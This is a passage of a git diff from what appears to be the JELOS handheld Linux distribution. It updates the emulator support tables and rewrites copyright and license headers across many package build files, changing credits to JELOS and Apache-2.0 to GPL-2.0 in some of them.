| +|Smith Engineering|Vectrex (vectrex)|1982|`vectrex`|.bin .gam .vec .zip .7z|**retroarch:** vecx (default)
| |SNK|Neo Geo (neogeo)|1990|`neogeo`|.7z .zip|**retroarch:** fbneo (default)
**retroarch:** mame2003_plus
**retroarch:** fbalpha2012
**retroarch:** fbalpha2019
**retroarch:** mame2010
**retroarch:** mame2015
**retroarch:** mame
| -|SNK|Neo Geo CD (neocd)|1990|`neocd`|.cue .iso .chd|**retroarch:** neocd (default)
**retroarch:** fbneo
| +|SNK|Neo Geo CD (neocd)|1994|`neocd`|.cue .iso .chd|**retroarch:** neocd (default)
**retroarch:** fbneo
| |SNK|Neo Geo Pocket (ngp)|1998|`ngp`|.ngc .ngp .zip .7z|**retroarch:** beetle_ngp (default)
**retroarch:** race
| |SNK|Neo Geo Pocket Color (ngpc)|1999|`ngpc`|.ngc .zip .7z|**retroarch:** beetle_ngp (default)
**retroarch:** race
| |Sony|PlayStation (psx)|1994|`psx`|.bin .cue .img .mdf .pbp .toc .cbn .m3u .ccd .chd .iso|**retroarch:** pcsx_rearmed32 (default)
**retroarch:** pcsx_rearmed
**retroarch:** beetle_psx
**duckstation:** duckstation-sa
**retroarch:** duckstation
**retroarch:** swanstation
| @@ -113,7 +113,7 @@ This document describes all available systems emulators and cores available for |Sony|PSP Minis (pspminis)|2004|`pspminis`|.iso .cso .pbp|**ppsspp:** ppsspp-sa (default)
**retroarch:** ppsspp
| |Sun Microsystems|J2ME (j2me)|2002|`j2me`|.jar|**retroarch:** freej2me (default)
| |Various|EasyRPG (easyrpg)|2003|`easyrpg`|.zip .easyrpg .ldb|**retroarch:** easyrpg (default)
| -|Various|OpenBOR (openbor)|2008|`openbor`|.pak|**OpenBOR:** OpenBOR (default)
| +|Various|OpenBOR (openbor)|2003|`openbor`|.pak|**OpenBOR:** OpenBOR (default)
| |Various|ScummVM (scummvm)|2001|`games`|.sh .svm .scummvm|**scummvmsa:** scummvm (default)
**retroarch:** scummvm
| |Watara|Supervision (supervision)|1992|`supervision`|.sv .zip .7z|**retroarch:** potator (default)
| |Welback Holdings|Mega Duck (megaduck)|1993|`megaduck`|.bin .zip .7z|**retroarch:** sameduck (default)
| diff --git a/documentation/PER_DEVICE_DOCUMENTATION/S922X/SUPPORTED_EMULATORS_AND_CORES.md b/documentation/PER_DEVICE_DOCUMENTATION/S922X/SUPPORTED_EMULATORS_AND_CORES.md index bccb089ab..8a3050fa8 100644 --- a/documentation/PER_DEVICE_DOCUMENTATION/S922X/SUPPORTED_EMULATORS_AND_CORES.md +++ b/documentation/PER_DEVICE_DOCUMENTATION/S922X/SUPPORTED_EMULATORS_AND_CORES.md @@ -14,7 +14,7 @@ This document describes all available systems emulators and cores available for | System|Tools (tools)|System|`modules`|.sh|| |Amstrad|CPC (amstradcpc)|1984|`amstradcpc`|.dsk .sna .tap .cdt .kcr .voc .m3u .zip .7z|**retroarch:** crocods (default)
**retroarch:** cap32
| |Arcade|Arcade (arcade)|1984|`arcade`|.zip .7z|**retroarch:** mame2003_plus (default)
**retroarch:** mame2000
**retroarch:** mame2010
**retroarch:** mame2015
**retroarch:** fbneo
**retroarch:** fbalpha2012
**retroarch:** fbalpha2019
**retroarch:** mame
| -|Arcade|Daphne (daphne)|1996|`daphne`|.daphne .zip|**hypseus:** hypseus (default)
**retroarch:** daphne
| +|Arcade|Daphne (daphne)|1996|`daphne`|.daphne .singe|**hypseus-singe:** hypseus-singe (default)
**retroarch:** daphne
| |Arcade|Final Burn Neo (fbn)|1986|`fbneo`|.7z .zip|**retroarch:** fbneo (default)
**retroarch:** mame2003_plus
**retroarch:** mame2010
**retroarch:** mame2015
**retroarch:** mame
**retroarch:** fbalpha2012
**retroarch:** fbalpha2019
| |Arcade|MAME (mame)|1948|`mame`|.7z .zip|**retroarch:** mame2003_plus (default)
**retroarch:** mame2010
**retroarch:** mame2015
**retroarch:** mame
**retroarch:** fbneo
**retroarch:** fbalpha2012
**retroarch:** fbalpha2019
| |Arduboy|Arduboy (arduboy)|2014|`arduboy`|.hex|**retroarch:** arduous (default)
| diff --git a/packages/apps/fileman/package.mk b/packages/apps/fileman/package.mk index 2cbcdfb43..640ee8e2c 100644 --- a/packages/apps/fileman/package.mk +++ b/packages/apps/fileman/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2021-present 351ELEC (https://github.com/351elec) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="fileman" PKG_VERSION="9f192b8d026568f232f6687882f519572623a992" diff --git a/packages/apps/moonlight/autostart/010-moonlight b/packages/apps/moonlight/autostart/010-moonlight index cbb223807..1b30ba554 100755 --- a/packages/apps/moonlight/autostart/010-moonlight +++ b/packages/apps/moonlight/autostart/010-moonlight @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Minimal OS variable loading for performance . /etc/profile.d/001-functions diff --git a/packages/apps/moonlight/package.mk b/packages/apps/moonlight/package.mk index f8c3b2800..29537caf9 100644 --- a/packages/apps/moonlight/package.mk +++ b/packages/apps/moonlight/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="moonlight" PKG_ARCH="any" diff --git a/packages/apps/oga_controls/package.mk b/packages/apps/oga_controls/package.mk index 7ccf23c4a..6168e9e05 100644 --- a/packages/apps/oga_controls/package.mk +++ b/packages/apps/oga_controls/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="oga_controls" PKG_VERSION="1604ee24150c1c5bb7c66bc4670919c2ad8f0064" diff --git a/packages/apps/portmaster/package.mk b/packages/apps/portmaster/package.mk index 91c1d8987..f02dea781 100644 --- a/packages/apps/portmaster/package.mk +++ b/packages/apps/portmaster/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="portmaster" PKG_VERSION="f8adbe08805d9fe9171cb2e3078f383631d1331d" diff --git a/packages/apps/portmaster/scripts/start_portmaster.sh b/packages/apps/portmaster/scripts/start_portmaster.sh index c3d6b62d5..9a9469bc9 100644 --- a/packages/apps/portmaster/scripts/start_portmaster.sh +++ b/packages/apps/portmaster/scripts/start_portmaster.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/audio/alsa-utils/package.mk b/packages/audio/alsa-utils/package.mk index 9763735cc..02d235ccd 100644 --- a/packages/audio/alsa-utils/package.mk +++ b/packages/audio/alsa-utils/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2016-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="alsa-utils" PKG_VERSION="1.2.9" diff --git a/packages/audio/bluez-alsa/package.mk b/packages/audio/bluez-alsa/package.mk index 45477b146..a5e84cdb7 100644 --- a/packages/audio/bluez-alsa/package.mk +++ b/packages/audio/bluez-alsa/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2022-present Marek Moeckel (wansti@discarded-ideas.org) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="bluez-alsa" PKG_VERSION="f7e6ee5" diff --git a/packages/audio/libao/package.mk b/packages/audio/libao/package.mk index 731070e5c..d1e8dae9c 100644 --- a/packages/audio/libao/package.mk +++ b/packages/audio/libao/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="libao" PKG_VERSION="1.2.0" diff --git a/packages/audio/libsndfile/package.mk b/packages/audio/libsndfile/package.mk index 9890f9957..5a3bd5827 100644 --- a/packages/audio/libsndfile/package.mk +++ b/packages/audio/libsndfile/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2021-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="libsndfile" PKG_VERSION="72f6af1" diff --git a/packages/audio/soundtouch/package.mk b/packages/audio/soundtouch/package.mk index 980ce7660..cd7042643 100644 --- a/packages/audio/soundtouch/package.mk +++ b/packages/audio/soundtouch/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="soundtouch" PKG_VERSION="2.3.2" diff --git a/packages/audio/taglib/package.mk b/packages/audio/taglib/package.mk index d98c308d9..b7da2cfde 100644 --- a/packages/audio/taglib/package.mk +++ b/packages/audio/taglib/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="taglib" PKG_VERSION="1.13.1" diff --git a/packages/compat/box64/package.mk b/packages/compat/box64/package.mk index 4c6d3d3ca..79b3d8ec0 100644 --- a/packages/compat/box64/package.mk +++ b/packages/compat/box64/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="box64" PKG_VERSION="0499c38466ca094b230ec6c825ec96ddcd987892" diff --git a/packages/compat/box64/profile.d/098-box64.conf b/packages/compat/box64/profile.d/098-box64.conf index 3ae06fd66..9c653b55c 100644 --- a/packages/compat/box64/profile.d/098-box64.conf +++ b/packages/compat/box64/profile.d/098-box64.conf @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) export BOX64_PREFER_EMULATED=1 export BOX64_LD_LIBRARY_PATH="/usr/share/box64/lib" diff --git a/packages/compat/box86/package.mk b/packages/compat/box86/package.mk index a40167243..f9b3fea78 100644 --- a/packages/compat/box86/package.mk +++ b/packages/compat/box86/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="box86" PKG_VERSION="a0a3389651998481f2ab2adb35e07bfcc5c26820" diff --git a/packages/compat/box86/profile.d/098-box86.conf b/packages/compat/box86/profile.d/098-box86.conf index a03217044..03a643bfa 100644 --- a/packages/compat/box86/profile.d/098-box86.conf +++ b/packages/compat/box86/profile.d/098-box86.conf @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) export BOX86_PREFER_EMULATED=1 export BOX86_LD_LIBRARY_PATH="/usr/share/box86/lib" diff --git a/packages/compat/lutris-wine/package.mk b/packages/compat/lutris-wine/package.mk index a981a3331..65021e161 100644 --- a/packages/compat/lutris-wine/package.mk +++ b/packages/compat/lutris-wine/package.mk @@ -1,6 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present Fewtarius -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="lutris-wine" PKG_VERSION="7.2-2" diff --git a/packages/compat/wine-wayland/package.mk b/packages/compat/wine-wayland/package.mk index a09ac3a0b..515e948c7 100644 --- a/packages/compat/wine-wayland/package.mk +++ b/packages/compat/wine-wayland/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0 -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="wine-wayland" PKG_VERSION="8.2.1" diff --git a/packages/compress/cpio/package.mk b/packages/compress/cpio/package.mk index a1f59f9b8..008520291 100644 --- a/packages/compress/cpio/package.mk +++ b/packages/compress/cpio/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="cpio" PKG_VERSION="2.14" diff --git a/packages/compress/gzip/package.mk b/packages/compress/gzip/package.mk index f75f41c14..a10073344 100644 --- a/packages/compress/gzip/package.mk +++ b/packages/compress/gzip/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="gzip" PKG_VERSION="1.13" diff --git a/packages/compress/xz/package.mk b/packages/compress/xz/package.mk index 6b30b89f6..c6871e29e 100644 --- a/packages/compress/xz/package.mk +++ b/packages/compress/xz/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="xz" PKG_VERSION="5.4.4" diff --git a/packages/compress/zstd/package.mk b/packages/compress/zstd/package.mk index 952491bbd..41ba1452a 100644 --- a/packages/compress/zstd/package.mk +++ b/packages/compress/zstd/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2017-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="zstd" PKG_VERSION="1.5.5" diff --git a/packages/databases/sqlite/package.mk b/packages/databases/sqlite/package.mk index edf58ba78..cac573859 100644 --- a/packages/databases/sqlite/package.mk +++ b/packages/databases/sqlite/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="sqlite" PKG_VERSION="3.42.0" diff --git a/packages/debug/apitrace/package.mk b/packages/debug/apitrace/package.mk index 2101bd608..92418d1da 100644 --- a/packages/debug/apitrace/package.mk +++ b/packages/debug/apitrace/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0 -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="apitrace" PKG_VERSION="00706d1" diff --git a/packages/debug/strace/package.mk b/packages/debug/strace/package.mk index 2aca2669e..0865c7650 100644 --- a/packages/debug/strace/package.mk +++ b/packages/debug/strace/package.mk @@ -2,7 +2,7 @@ # Copyright (C) 2016-present Team LibreELEC (https://libreelec.tv) PKG_NAME="strace" -PKG_VERSION="6.4" +PKG_VERSION="6.5" PKG_LICENSE="BSD" PKG_SITE="https://strace.io/" PKG_URL="https://strace.io/files/${PKG_VERSION}/strace-${PKG_VERSION}.tar.xz" diff --git a/packages/debug/valgrind/package.mk b/packages/debug/valgrind/package.mk index 32fafcd0b..f88a2560a 100644 --- a/packages/debug/valgrind/package.mk +++ b/packages/debug/valgrind/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2016-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="valgrind" PKG_VERSION="3.21.0" diff --git a/packages/devel/arm-mem/package.mk b/packages/devel/arm-mem/package.mk index cf1ead721..8c2dd1c0d 100644 --- a/packages/devel/arm-mem/package.mk +++ b/packages/devel/arm-mem/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2019-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="arm-mem" PKG_VERSION="b48ea154fd74410022d8189003cd69fad8f3d02c" diff --git a/packages/devel/autoconf-archive/package.mk b/packages/devel/autoconf-archive/package.mk index 4d582e1c5..c39262dd4 100644 --- a/packages/devel/autoconf-archive/package.mk +++ b/packages/devel/autoconf-archive/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2020-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="autoconf-archive" PKG_VERSION="2023.02.20" diff --git a/packages/devel/binutils-aarch64/package.mk b/packages/devel/binutils-aarch64/package.mk index e7d1add2e..3c091db0f 100644 --- a/packages/devel/binutils-aarch64/package.mk +++ b/packages/devel/binutils-aarch64/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="binutils-aarch64" PKG_VERSION="$(get_pkg_version binutils)" diff --git a/packages/devel/binutils-arm-none-eabi/package.mk b/packages/devel/binutils-arm-none-eabi/package.mk index 5ea6d5d8f..245647fae 100644 --- a/packages/devel/binutils-arm-none-eabi/package.mk +++ b/packages/devel/binutils-arm-none-eabi/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="binutils-arm-none-eabi" PKG_VERSION="" diff --git a/packages/devel/binutils-bpf/package.mk b/packages/devel/binutils-bpf/package.mk index 8fc62985f..f1e10dec1 100644 --- a/packages/devel/binutils-bpf/package.mk +++ b/packages/devel/binutils-bpf/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="binutils-bpf" PKG_VERSION="" diff --git a/packages/devel/binutils-or1k/package.mk b/packages/devel/binutils-or1k/package.mk index 374cf3ce5..d0e2d5a46 100644 --- a/packages/devel/binutils-or1k/package.mk +++ b/packages/devel/binutils-or1k/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="binutils-or1k" PKG_VERSION="" diff --git a/packages/devel/binutils/package.mk b/packages/devel/binutils/package.mk index 06194d15c..f334ba3b3 100644 --- a/packages/devel/binutils/package.mk +++ b/packages/devel/binutils/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="binutils" PKG_VERSION="2.41" diff --git a/packages/devel/boost/package.mk b/packages/devel/boost/package.mk index 5124682fe..673dd4624 100644 --- a/packages/devel/boost/package.mk +++ b/packages/devel/boost/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2019-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="boost" PKG_VERSION="1.83.0" diff --git a/packages/devel/ccache/package.mk b/packages/devel/ccache/package.mk index cbd7e78d9..37ac53928 100644 --- a/packages/devel/ccache/package.mk +++ b/packages/devel/ccache/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="ccache" PKG_VERSION="4.8.2" diff --git a/packages/devel/cmake/package.mk b/packages/devel/cmake/package.mk index 3bfcfa68d..b60f0a638 100644 --- a/packages/devel/cmake/package.mk +++ b/packages/devel/cmake/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2016-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="cmake" PKG_VERSION="3.27.3" diff --git a/packages/devel/configtools/package.mk b/packages/devel/configtools/package.mk index 647e7e95c..46502ae27 100644 --- a/packages/devel/configtools/package.mk +++ b/packages/devel/configtools/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2016-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="configtools" PKG_VERSION="d4e37b5868ef910e3e52744c34408084bb13051c" diff --git a/packages/devel/ecm/package.mk b/packages/devel/ecm/package.mk index 707cbfbff..67cf2f268 100644 --- a/packages/devel/ecm/package.mk +++ b/packages/devel/ecm/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="ecm" PKG_VERSION="v5.109.0" diff --git a/packages/devel/elfutils/package.mk b/packages/devel/elfutils/package.mk index 2a2de08d2..c9a18138e 100644 --- a/packages/devel/elfutils/package.mk +++ b/packages/devel/elfutils/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="elfutils" PKG_VERSION="0.189" diff --git a/packages/devel/glib/package.mk b/packages/devel/glib/package.mk index 68497c32c..0545fbb02 100644 --- a/packages/devel/glib/package.mk +++ b/packages/devel/glib/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2016-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="glib" PKG_VERSION="2.77.1" diff --git a/packages/devel/hidapi/package.mk b/packages/devel/hidapi/package.mk index a88a7a8c3..b264fcb93 100644 --- a/packages/devel/hidapi/package.mk +++ b/packages/devel/hidapi/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="hidapi" PKG_VERSION="d3013f0" diff --git a/packages/devel/libcap/package.mk b/packages/devel/libcap/package.mk index b04f0919b..3b3974104 100644 --- a/packages/devel/libcap/package.mk +++ b/packages/devel/libcap/package.mk @@ -2,7 +2,7 @@ # Copyright (C) 2010-2011 Roman Weber (roman@openelec.tv) # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2019-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="libcap" PKG_VERSION="2.69" diff --git a/packages/devel/libdatrie/package.mk b/packages/devel/libdatrie/package.mk index 6de960c78..85fb9bac4 100644 --- a/packages/devel/libdatrie/package.mk +++ b/packages/devel/libdatrie/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="libdatrie" PKG_VERSION="0.2.13" diff --git a/packages/devel/libp11-kit/package.mk b/packages/devel/libp11-kit/package.mk index 9f4b67b95..c5335ea83 100644 --- a/packages/devel/libp11-kit/package.mk +++ b/packages/devel/libp11-kit/package.mk @@ -1,6 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="libp11-kit" PKG_VERSION="b6411d7" diff --git a/packages/devel/libthai/package.mk b/packages/devel/libthai/package.mk index 5319d3e19..cd985448c 100644 --- a/packages/devel/libthai/package.mk +++ b/packages/devel/libthai/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="libthai" PKG_VERSION="0.1.29" diff --git a/packages/devel/libtraceevent/package.mk b/packages/devel/libtraceevent/package.mk index af8172edc..65138b2ac 100644 --- a/packages/devel/libtraceevent/package.mk +++ b/packages/devel/libtraceevent/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="libtraceevent" PKG_VERSION="1.7.3" diff --git a/packages/devel/libtracefs/package.mk b/packages/devel/libtracefs/package.mk index 9fb4e61a9..d79efe84c 100644 --- a/packages/devel/libtracefs/package.mk +++ b/packages/devel/libtracefs/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="libtracefs" PKG_VERSION="1.7.0" diff --git a/packages/devel/make/package.mk b/packages/devel/make/package.mk index 9f61ca752..d9e41e4b1 100644 --- a/packages/devel/make/package.mk +++ b/packages/devel/make/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="make" PKG_VERSION="4.4.1" diff --git a/packages/devel/mpfr/package.mk b/packages/devel/mpfr/package.mk index 3045f39e5..dec62c7b8 100644 --- a/packages/devel/mpfr/package.mk +++ b/packages/devel/mpfr/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: 